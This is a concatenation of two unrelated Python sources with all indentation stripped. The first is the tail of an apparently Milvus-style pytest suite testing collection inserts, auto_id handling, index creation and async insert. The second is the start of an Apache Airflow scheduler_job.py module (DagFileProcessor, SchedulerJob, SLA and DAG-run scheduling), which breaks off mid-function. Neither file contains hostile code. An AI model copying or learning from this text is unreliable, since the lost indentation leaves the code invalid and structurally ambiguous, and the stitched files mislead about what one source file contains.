assert collection_w.name not in collection_list
@pytest.mark.tags(CaseLabel.L1)
def test_insert_create_index(self):
"""
target: test insert and create index
method: 1. insert 2. create index
expected: verify num entities and index
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
assert collection_w.num_entities == ct.default_nb
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_float_vec_field_name, default_index_params)
assert collection_w.indexes[0] == index
@pytest.mark.tags(CaseLabel.L1)
def test_insert_after_create_index(self):
"""
target: test insert after create index
method: 1. create index 2. insert data
expected: verify index and num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_float_vec_field_name, default_index_params)
assert collection_w.indexes[0] == index
df = cf.gen_default_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_binary_after_index(self):
"""
target: test insert binary after index
method: 1.create index 2.insert binary data
expected: 1.index ok 2.num entities correct
"""
schema = cf.gen_default_binary_collection_schema()
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), schema=schema)
collection_w.create_index(ct.default_binary_vec_field_name, default_binary_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_binary_vec_field_name, default_binary_index_params)
assert collection_w.indexes[0] == index
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_create_index(self):
"""
target: test create index in auto_id=True collection
method: 1.create auto_id=True collection and insert 2.create index
expected: index correct
"""
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), schema=schema)
df = cf.gen_default_dataframe_data(ct.default_nb)
df.drop(ct.default_int64_field_name, axis=1, inplace=True)
mutation_res, _ = collection_w.insert(data=df)
assert cf._check_primary_keys(mutation_res.primary_keys, ct.default_nb)
assert collection_w.num_entities == ct.default_nb
# create index
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
assert collection_w.has_index()[0]
index, _ = collection_w.index()
assert index == Index(collection_w.collection, ct.default_float_vec_field_name, default_index_params)
assert collection_w.indexes[0] == index
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_true(self):
"""
target: test insert ids fields values when auto_id=True
method: 1.create collection with auto_id=True 2.insert without ids
expected: verify primary_keys and num_entities
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
df = cf.gen_default_dataframe_data(ct.default_nb)
df.drop(ct.default_int64_field_name, axis=1, inplace=True)
mutation_res, _ = collection_w.insert(data=df)
assert cf._check_primary_keys(mutation_res.primary_keys, ct.default_nb)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_twice_auto_id_true(self):
"""
target: test insert ids fields twice when auto_id=True
method: 1.create collection with auto_id=True 2.insert twice
expected: verify primary_keys unique
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
nb = 10
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
df = cf.gen_default_dataframe_data(nb)
df.drop(ct.default_int64_field_name, axis=1, inplace=True)
mutation_res, _ = collection_w.insert(data=df)
primary_keys = mutation_res.primary_keys
assert cf._check_primary_keys(primary_keys, nb)
mutation_res_1, _ = collection_w.insert(data=df)
primary_keys.extend(mutation_res_1.primary_keys)
assert cf._check_primary_keys(primary_keys, nb * 2)
assert collection_w.num_entities == nb * 2
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_true_list_data(self):
"""
target: test insert ids fields values when auto_id=True
method: 1.create collection with auto_id=True 2.insert list data with ids field values
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
data = cf.gen_default_list_data(nb=ct.default_nb)
mutation_res, _ = collection_w.insert(data=data[1:])
assert mutation_res.insert_count == ct.default_nb
assert cf._check_primary_keys(mutation_res.primary_keys, ct.default_nb)
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_true_with_dataframe_values(self):
"""
target: test insert with auto_id=True
method: create collection with auto_id=True
expected: 1.verify num entities 2.verify ids
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
df = cf.gen_default_dataframe_data(nb=100)
error = {ct.err_code: 0, ct.err_msg: 'Auto_id is True, primary field should not have data'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
assert collection_w.is_empty
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_true_with_list_values(self):
"""
target: test insert with auto_id=True
method: create collection with auto_id=True
expected: 1.verify num entities 2.verify ids
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(auto_id=True)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
data = cf.gen_default_list_data(nb=100)
error = {ct.err_code: 0, ct.err_msg: 'The data fields number is not match with schema'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
assert collection_w.is_empty
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_false_same_values(self):
"""
target: test insert same ids with auto_id false
method: 1.create collection with auto_id=False 2.insert same int64 field values
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 100
data = cf.gen_default_list_data(nb=nb)
data[0] = [1 for i in range(nb)]
mutation_res, _ = collection_w.insert(data)
assert mutation_res.insert_count == nb
assert mutation_res.primary_keys == data[0]
@pytest.mark.tags(CaseLabel.L1)
def test_insert_auto_id_false_negative_values(self):
"""
target: test insert negative ids with auto_id false
method: auto_id=False, primary field values is negative
expected: verify num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 100
data = cf.gen_default_list_data(nb)
data[0] = [i for i in range(0, -nb, -1)]
mutation_res, _ = collection_w.insert(data)
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_multi_threading(self):
"""
target: test concurrent insert
method: multi threads insert
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(ct.default_nb)
thread_num = 4
threads = []
primary_keys = df[ct.default_int64_field_name].values.tolist()
def insert(thread_i):
log.debug(f'In thread-{thread_i}')
mutation_res, _ = collection_w.insert(df)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == primary_keys
for i in range(thread_num):
x = threading.Thread(target=insert, args=(i,))
threads.append(x)
x.start()
for t in threads:
t.join()
assert collection_w.num_entities == ct.default_nb * thread_num
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason="Currently primary keys are not unique")
def test_insert_multi_threading_auto_id(self):
"""
target: test concurrent insert auto_id=True collection
method: 1.create auto_id=True collection 2.concurrent insert
expected: verify primary keys unique
"""
pass
@pytest.mark.tags(CaseLabel.L2)
def test_insert_multi_times(self):
"""
target: test insert multi times
method: insert data multi times
expected: verify num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
step = 120
for _ in range(ct.default_nb // step):
df = cf.gen_default_dataframe_data(step)
mutation_res, _ = collection_w.insert(data=df)
assert mutation_res.insert_count == step
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_all_datatype_collection(self):
"""
target: test insert into collection that contains all datatype fields
method: 1.create all datatype collection 2.insert data
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_dataframe_all_data_type(nb=nb)
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name)
assert self.collection_wrap.num_entities == nb
class TestInsertAsync(TestcaseBase):
"""
******************************************************************
The following cases are used to test insert async
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_insert_sync(self):
"""
target: test async insert
method: insert with async=True
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(nb=ct.default_nb)
future, _ = collection_w.insert(data=df, _async=True)
future.done()
mutation_res = future.result()
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_async_false(self):
"""
target: test insert with false async
method: async = false
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(nb=ct.default_nb)
mutation_res, _ = collection_w.insert(data=df, _async=False)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_insert_async_callback(self):
"""
target: test insert with callback func
method: insert with callback func
expected: verify num entities
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(nb=ct.default_nb)
future, _ = collection_w.insert(data=df, _async=True, _callback=assert_mutation_result)
future.done()
mutation_res = future.result()
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_long(self):
"""
target: test insert with async
method: insert 5w entities with callback func
expected: verify num entities
"""
nb = 50000
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(nb)
future, _ = collection_w.insert(data=df, _async=True)
future.done()
mutation_res = future.result()
assert mutation_res.insert_count == nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_callback_timeout(self):
"""
target: test insert async with callback
method: insert 10w entities with timeout=1
expected: raise exception
"""
nb = 100000
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(nb)
future, _ = collection_w.insert(data=df, _async=True, _callback=assert_mutation_result, timeout=1)
with pytest.raises(Exception):
future.result()
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_data(self):
"""
target: test insert async with invalid data
method: insert async with invalid data
expected: raise exception
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
columns = [ct.default_int64_field_name, ct.default_float_vec_field_name]
df = pd.DataFrame(columns=columns)
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe"}
collection_w.insert(data=df, _async=True, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_partition(self):
"""
target: test insert async with invalid partition
method: insert async with invalid partition
expected: raise exception
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data()
err_msg = "partitionID of partitionName:p can not be find"
future, _ = collection_w.insert(data=df, partition_name="p", _async=True)
future.done()
with pytest.raises(Exception, match=err_msg):
future.result()
def assert_mutation_result(mutation_res):
assert mutation_res.insert_count == ct.default_nb
|
scheduler_job.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from datetime import timedelta
from time import sleep
from past.builtins import basestring
import six
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow.configuration import conf
from airflow import executors, models, settings
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.jobs.base_job import BaseJob
from airflow.models import DagRun, SlaMiss, errors
from airflow.settings import Stats
from airflow.ti_deps.dep_context import DepContext, SCHEDULEABLE_STATES, SCHEDULED_DEPS
from airflow.operators.dummy_operator import DummyOperator
from airflow.ti_deps.deps.pool_slots_available_dep import STATES_TO_COUNT_AS_RUNNING
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (AbstractDagFileProcessor,
DagFileProcessorAgent,
SimpleDag,
SimpleDagBag,
SimpleTaskInstance,
list_py_file_paths)
from airflow.utils.db import provide_session
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.state import State
class DagFileProcessor(AbstractDagFileProcessor, LoggingMixin):
"""Helps call SchedulerJob.process_file() in a separate process.
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: unicode
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_id_white_list: If specified, only look at these DAG ID's
:type dag_id_white_list: list[unicode]
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_id_white_list, zombies):
self._file_path = file_path
        # The process that was launched to process the given file path.
self._process = None
self._dag_id_white_list = dag_id_white_list
self._pickle_dags = pickle_dags
self._zombies = zombies
# The result of Scheduler.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
        # This ID is used to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessor.class_creation_counter
DagFileProcessor.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_id_white_list,
thread_name,
zombies):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: unicode
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_id_white_list: if specified, only examine DAG ID's that are
in this list
:type dag_id_white_list: list[unicode]
:param thread_name: the name to use for the process that is launched
:type thread_name: unicode
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
stdout = StreamLogWriter(log, logging.INFO)
stderr = StreamLogWriter(log, logging.WARN)
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
sys.stdout = stdout
sys.stderr = stderr
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s",
os.getpid(), file_path)
scheduler_job = SchedulerJob(dag_ids=dag_id_white_list, log=log)
result = scheduler_job.process_file(file_path,
zombies,
pickle_dags)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
self._parent_channel, _child_channel = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_id_white_list,
"DagFileProcessor{}".format(self._instance_id),
self._zombies
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
self._process.join(5)
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param run_duration: how long to run (in seconds) before exiting
:type run_duration: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs', fallback=-1),
processor_poll_interval=conf.getfloat(
'scheduler', 'processor_poll_interval', fallback=1),
run_duration=None,
do_pickle=False,
log=None,
*args, **kwargs):
"""
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self.run_duration = run_duration
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super(SchedulerJob, self).__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'max_threads')
if log:
self._log = log
self.using_sqlite = False
self.using_mysql = False
if conf.get('core', 'sql_alchemy_conn').lower().startswith('sqlite'):
self.using_sqlite = True
if conf.get('core', 'sql_alchemy_conn').lower().startswith('mysql'):
self.using_mysql = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
if run_duration is None:
self.run_duration = conf.getint('scheduler',
'run_duration')
self.processor_agent = None
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super(SchedulerJob, self).is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
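    # Worked example of the aliveness rule above: with
    # scheduler_health_check_threshold = 30, a RUNNING job whose latest_heartbeat
    # is 10 seconds old is alive, while one last heard from 45 seconds ago is not.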
@provide_session
def manage_slas(self, dag, session=None):
"""
        Find all tasks that have SLAs defined, and send alert emails
        where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
# This is a temporary fix for 1.10.4 release.
# Background: AIRFLOW-4297
# TODO: refactor manage_slas() to handle related issues.
if dag.normalized_schedule_interval is None:
self.log.info("SLA check for DAGs with schedule_interval 'None'/'@once' are "
"skipped in 1.10.4, due to related refactoring going on.")
return
TI = models.TaskInstance
sq = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == sq.c.task_id,
TI.execution_date == sq.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas:
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception:
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
            <pre><code>{task_list}\n</code></pre>
            Blocking tasks:
            <pre><code>{blocking_task_list}\n{bug}</code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.",
sla.task_id)
continue
tasks_missed_sla.append(task)
emails = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, basestring):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception:
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
        For the DAGs in the given DagBag, record any associated import errors and clear
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in six.iteritems(dagbag.import_errors):
session.add(errors.ImportError(
filename=filename,
timestamp=timezone.utcnow(),
stacktrace=stacktrace))
session.commit()
@provide_session
def create_dag_run(self, dag, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(DagRun.ID_PREFIX + '%')
))
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
            # don't do scheduler catchup for DAGs that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now:
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
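            # Worked example (illustrative): with a @daily schedule, catchup=False and
            # now = 2019-01-10 12:00 UTC, following_schedule(now) is 2019-01-11 00:00,
            # which is after now, so new_start = previous_schedule(2019-01-10 00:00)
            # = 2019-01-09 00:00; the effective start_date is moved up so that only the
            # most recent completed period is scheduled.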
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
